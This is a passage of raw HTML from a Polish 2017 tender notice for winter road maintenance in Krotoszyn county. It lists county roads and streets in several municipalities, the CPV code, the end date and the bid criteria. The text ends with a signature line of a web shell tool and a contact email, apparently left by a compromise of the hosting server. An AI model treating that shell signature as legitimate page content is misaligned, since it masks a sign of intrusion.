                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zimowe utrzymanie dróg obejmuje następujące odcinki dróg i ulic:DROGI POZA MIEJSKIE KROTOSZYN -I kolejność standard 4:Droga powiatowa nr 5158 P Krotoszyn (Raszkowska) Kobierno-Różopole-Roszki- gr. powiatu ostrowskiego,
Droga powiatowa nr 5166P Krotoszyn (Bolewskiego) Chachalnia  skrzyżowania z drogą 5165P  -do drogi wojewódzkiej nr 444 Krotoszyn- Sulmierzyce,
II kolejność standard 5:Droga powiatowa nr 4332P Roszki-Orpiszew-gr. powiatu ostrowskiego  Janków Zaleśny,Droga powiatowa nr 5165 P gr. powiatu Ostrowskiego Chwaliszew Chachalnia do drogi wojewódzkiej nr 444 Krotoszyn  Sulmierzyce, Droga powiatowa nr 5161 P Ugrzele-Baszyny-gr, powiatu ostrowskiego (Janków Zaleśny),Droga powiatowa nr 5159 P Krotoszyn(Spartańska)- Tomnice-Jasne Pole-Orpiszew-Baszyny, Droga powiatowa nr 5155P Biadki- Duszna Górka (skrzyżowanie z drogą nr 5162P) ,
Droga powiatowa nr 5162 P Krotoszyn (Stawna, Gorzupska-Gorzupia-Świnków- gr. powiatu ostrowskiego Janków Zaleśny,Droga powiatowa nr 5163 P Orpiszew-Świnków-Biadki do drogi krajowej nr 36,Droga powiatowa nr 5157 P Kobierno-Tomnice-Gorzupia Smoszew do drogi krajowej nr 36, 
Droga powiatowa nr 5164P Biadki- Chwaliszew do skrzyżowania z drogą 5165P, 


<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin płatności</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>ZADANIE NR 5 zimowe utrzymanie dróg na terenie Gminy  Krotoszyna - zachód<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zimowe utrzymanie dróg obejmuje następujące odcinki dróg i ulic:I kolejność standard 4 :Droga powiatowa nr 4918P Wielowieś od skrzyżowania z drogą nr 5136P Benice-Wróżewy-Krotoszyn (Szosa Benicka),II kolejność standard 5 
Droga powiatowa nr 5140 P Wronów od skrzyżowania z drogą gminną- Benice,
Droga powiatowa nr 5141 P Benice-Ustków, Droga powiatowa nr 5136 P Wielowieś Wyganów ,Droga powiatowa nr 5142P  do drogi krajowej nr 15 Bożacin-Wróżewy- Lutogniew, Droga powiatowa nr 5242 P od drogi krajowej nr 36 Lutogniew-Dzierżanów- Rojew do skrzyżowania z drogą 4097 P.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin płatności</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>ZADANIE NR 6 zimowe utrzymanie dróg na terenie Miasta Sulmierzyce <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zimowe utrzymanie dróg obejmuje następujące odcinki dróg i ulic:MIASTO SULMIERZYCE :I kolejność standard 3:Poznańska do m. Chwaliszew do skrzyżowania z drogą 5165P; Powstańców Wlkp.; Uciechowska; Wrocławska; Kaliska,
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin płatności</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>7
                  
                <b>Nazwa: </b>ZADANIE NR 7 zimowe utrzymanie dróg na terenie Gminy i Miasta Zduny  <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zimowe utrzymanie dróg obejmuje następujące odcinki dróg i ulic:MIASTO ZDUNY-(ulice ) -I kolejność standard 3:-Kobylińska; Pl. Kościuszki ; Mickiewicza;  1 Maja ; Ostrowska ; Rynek; Plac Ks. Skargi,II kolejność standard 4:Sulmierzycka,DROGI POZA MIEJSKIE ZDUNY:I kolejność standard 3-
Droga powiatowa nr 5129P od drogi krajowej nr 15 Zduny ul. Kobylińska-Baszków do kościoła- skrzyżowanie z drogą 5500P,II kolejność standard 4:
Droga powiatowa nr 5500 P Krotoszyn-Konarzew-Baszków,II kolejność- standard 5:Droga powiatowa nr 5165 P Zduny-Rynek, Mickiewicza, Pl. Skargi, Ostrowska- Chachalnia Ujazd,Droga powiatowa nr 5144 P Baszków-Bestwin-Ruda gr województwa dolnośląskiego ,Droga powiatowa nr 5167P  Zduny ( ul. Sulmierzycka) granica woj. dolnośląskiego Ujazd ,Droga powiatowa nr 5500P Baszków-gr. powiatu Jutrosin do ostatnich zabudowań,


<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin płatności</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>8
                  
                <b>Nazwa: </b>ZADANIE NR 8 zimowe utrzymanie dróg na terenie  Miasta i Gminy  Kobylin  <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zimowe utrzymanie dróg obejmuje następujące odcinki dróg i ulic:MIASTO KOBYLIN ( ulice) :I kolejność standard 3-Al. Powstańców Wlkp; Baszkowska; Dworcowa ;Grunwaldzka; Krobska; Kolejowa; Kopernika; Rzemiechowska; Strzelecka,DROGI POZA MIEJSKIE KOBYLIN :I Kolejność  standard 3-Droga powiatowa nr 5129 P  Kobylin (Baszkowska ) Baszków  do kościoła do skrzyżowania z drogą nr 5500P,II kolejność standard 4:Droga powiatowa nr 5129 P  Kobylin (Baszkowska ) Baszków  do kościoła do skrzyżowania z drogą nr 5500P,Droga powiatowa nr 5133 P Kromolice-Targoszyce-Łagiewniki, 
Droga powiatowa nr 4097 P Rojew-Kuklinów-Kromolice,Droga powiatowa nr 4803P Pępowo- Sroki- Górka-Kobylin,Droga powiatowa nr 4920 P (Ochla) gr. Powiatu Krotoszyńskiego- Łagiewniki-Starkówiec-Kobylin,Droga powiatowa nr 4921 P(Gumienice)-gr .powiatu krotoszyńskiego- Zalesie Wielkie- Zalesie Małe-Górka,Droga powiatowa nr 5132 P Zalesie Wielkie Łagiewniki, 
Droga powiatowa nr 5150P Smolice-Rogożewo,II kolejność standard 5:Droga powiatowa nr 5130P Kobylin (Berdychowska)-Berdychów wieś,Droga powiatowa nr 5131 Starkówiec-Fijałów-Wyganów do drogi krajowej nr 36 ,Droga powiatowa nr 5134P Zalesie Wielkie- do drogi 4921P,Droga powiatowa nr 5135P od drogi krajowej nr 36 Kuklinów-Starygród-Benice (do kościoła do drogi nr 4918P),Droga powiatowa nr 5242 Kobylin (ul. Rzemiechowska)-Rzemiechów wieś,Droga powiatowa nr 4923 P (Pępowo)- gr. powiatu krotoszyńskiego - Zalesie Małe,Droga powiatowa nr 4925 P (Czeluścin)- gr. powiatu krotoszyńskiego- Rębiechów-Kobylin,Droga powiatowa nr 5125 P (Sroki) gr. powiatu krotoszyńskiego (Czeluścin) Sroki ,Droga powiatowa nr 4926 P (Pasierby) gr, powiatu krotoszyńskiego- Raszewy-Smolice, 

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin płatności</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com